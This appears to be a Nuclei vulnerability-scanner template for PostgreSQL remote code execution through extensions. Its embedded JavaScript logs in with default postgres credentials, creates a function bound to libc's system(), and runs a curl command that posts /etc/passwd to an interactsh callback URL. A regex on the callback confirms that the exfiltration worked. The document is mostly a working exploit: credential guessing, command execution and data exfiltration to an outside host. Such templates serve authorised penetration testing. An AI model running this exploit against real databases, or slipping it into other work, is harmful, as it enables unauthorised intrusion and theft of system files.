id: pgsql-extensions-rce

info:
  name: PostgreSQL 8.1  Extensions - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    PostgreSQL allows for extensions, which are modules providing extra functionality like functions, operators, or types. Starting from version 8.1, these extensions must be compiled with a special header for compatibility with PostgreSQL's extension mechanism.
  reference:
    - https://www.dionach.com/postgresql-9-x-remote-command-execution/
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6
    - https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
  metadata:
    verified: true
    max-request: 1
    shodan-query: "product:\"PostgreSQL\""
  tags: postgresql,js,network,rce
javascript:
  - code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      const collab = shurl
      const qry = ["CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", "SELECT system('curl -X POST -d @/etc/passwd "+ collab +"');"];
      for (const x of qry){
        connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, x);
        Export(connected);
      }

    args:
      Host: "{{Host}}"
      Port: 5432
      User: "{{usernames}}"
      Pass: "{{password}}"
      Db: "{{database}}"
      shurl: http://{{interactsh-url}}

    payloads:
      usernames:
        - postgres
      database:
        - postgres
      password:
        - postgres

    attack: clusterbomb

    matchers:
      - type: regex
        part: interactsh_request
        regex:
          - "root:[x*]:0:0:"
# digest: 490a0046304402204a7b50e1186d11ccd0034676de87f92710cedbc8085ffd69428d81b0410caf0d02201d1ad1956fe3f2753b210299a22f45f16b5fc9ddbc6c64958c21367ef95af431:922c64590222798bb761d5b6d8e72950